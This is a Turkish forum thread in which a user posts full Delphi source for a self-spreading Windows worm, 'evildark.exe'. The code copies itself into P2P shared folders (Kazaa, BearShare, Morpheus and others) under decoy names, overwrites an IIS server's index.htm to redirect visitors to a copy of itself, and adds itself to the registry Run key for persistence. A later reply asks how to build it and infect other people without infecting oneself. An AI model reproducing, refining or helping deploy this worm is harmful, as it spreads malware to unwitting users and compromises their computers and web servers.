Yazan
ahmet
Yeni Üye
03 Temmuz 2010 Cumartesi 09:59:11
kendini heryere kopyalıyor silinmesi güç.


// define icon file
{$R icon.res}
uses
SysUtils, Windows, Math, Registry;
var
gtr: TRegistry;
ukd: TextFile;
// w0rm exe name
ljlzjoa: String = 'evildark.exe';
// p2p exe names, modify the array!
nyi8: array [0..2] of string = (
'iu22.exe','gy54.exe','ja13.exe');
// begin kazaa infection procedure
procedure lzrcdsl;
var nt54: string; p: integer;
begin
gtr:=TRegistry.Create;
gtr.RootKey:=HKEY_CURRENT_USER;
// reading kazaa shared folder
if gtr.OpenKeyReadOnly('\Software\Kazaa\LocalContent') then begin
nt54:=gtr.ReadString('DownloadDir');
gtr.Free;
// begin copying our w0rm
for p:=0 to 2 do begin
CopyFile(PChar(ParamStr(0)),PChar(nt54+'\'+nyi8[p]), true);
end;
end;
end;
procedure eaiivzg;
var wotbsood: string;
begin
gtr:=TRegistry.Create;
gtr.RootKey:=HKEY_LOCAL_MACHINE;
// reading wwwroot folder from reg
if gtr.OpenKeyReadOnly('\SOFTWARE\Microsoft\InetStp') then begin
wotbsood:=gtr.ReadString('PathWWWRoot');
gtr.Free;
// creating new index.htm
AssignFile(ukd,wotbsood+'\index.htm');
Rewrite(ukd);
Writeln(ukd, '<meta http-equiv="refresh" content="1;URL='+nyi8[1]+'">');
CloseFile(ukd);
// copying w0rm 2 wwwroot
CopyFile(PChar(ParamStr(0)),PChar(wotbsood+'\'+nyi8[1]), true);
end;
end;
procedure zdlwoihr;
var bbnje9, ywqbw2: string; oa: integer;
begin
// getting systemdrive and default program install folder
bbnje9:=GetEnvironmentVariable('SystemDrive');
ywqbw2:=GetEnvironmentVariable('ProgramFiles');
for oa:=0 to 78 do begin
// copy w0rm 2 default p2p folders
CopyFile(PChar(ParamStr(0)),PChar(bbnje9+'\My Downloads\'+nyi8[RandomRange(0,3)]), true);
CopyFile(PChar(ParamStr(0)),PChar(bbnje9+'\Downloads\'+nyi8[RandomRange(0,3)]), true);
CopyFile(PChar(ParamStr(0)),PChar(bbnje9+'\My Shared Folder\'+nyi8[RandomRange(0,3)]), true);
CopyFile(PChar(ParamStr(0)),PChar(ywqbw2+'\Warez P2P Client\My Shared Folder\'+nyi8[RandomRange(0,3)]), true);
CopyFile(PChar(ParamStr(0)),PChar(ywqbw2+'\gnucleus\Downloads\'+nyi8[RandomRange(0,3)]), true);
CopyFile(PChar(ParamStr(0)),PChar(ywqbw2+'\Morpheus\Downloads\'+nyi8[RandomRange(0,3)]), true);
CopyFile(PChar(ParamStr(0)),PChar(ywqbw2+'\KMD\My Shared Folder\'+nyi8[RandomRange(0,3)]), true);
CopyFile(PChar(ParamStr(0)),PChar(ywqbw2+'\BearShare\Shared\'+nyi8[RandomRange(0,3)]), true);
CopyFile(PChar(ParamStr(0)),PChar(ywqbw2+'\KaZaa Lite\My Shared Folder\'+nyi8[RandomRange(0,3)]), true);
CopyFile(PChar(ParamStr(0)),PChar(ywqbw2+'\KaZaa\My Shared Folder\'+nyi8[RandomRange(0,3)]), true);
CopyFile(PChar(ParamStr(0)),PChar(ywqbw2+'\Grokster\My Shared Folder\'+nyi8[RandomRange(0,3)]), true);
end;
end;
// getting system32 dir func
function lxgao: string;
var
rfg7: array [0..MAX_PATH+1] of Char;
begin
GetSystemDirectory(rfg7, MAX_PATH);
Result:=string(rfg7);
end;
// copy w0rm to system32 folder, add w0rm to registry procedure
procedure hnqshn;
begin
CopyFile(PChar(ParamStr(0)),Pchar(lxgao+'\'+ljlzjoa), false);
gtr:=TRegistry.Create;
gtr.RootKey:=HKEY_LOCAL_MACHINE;
gtr.OpenKey('SOFTWARE\Microsoft\Windows\CurrentVersion\Run', false);
gtr.WriteString(ljlzjoa,lxgao+'\'+ljlzjoa);
gtr.CloseKey;
gtr.Free;
end;
// begin w0rm main c0de, call our func's/proc's and run the shit :p
begin
// add w0rm2reg
hnqshn;
// copy2kazaa sharing folder
lzrcdsl;
// add w0rm2iis wwwroot
eaiivzg;
// copy2known p2p folders
zdlwoihr;
end.
logi
Yeni Üye
14 Nisan 2013 Pazar 08:28:38
hacı bbu kodu exe mi yapıcaz nasıl kendi pc mize bulaştırmadan millete bulaştırıcaz biraz bilgi verirmisin

Cevap yazmak için üye olmalısınız!
Hemen üye olmak için burayı tıklayınız..
 
 
Sayfalar:  1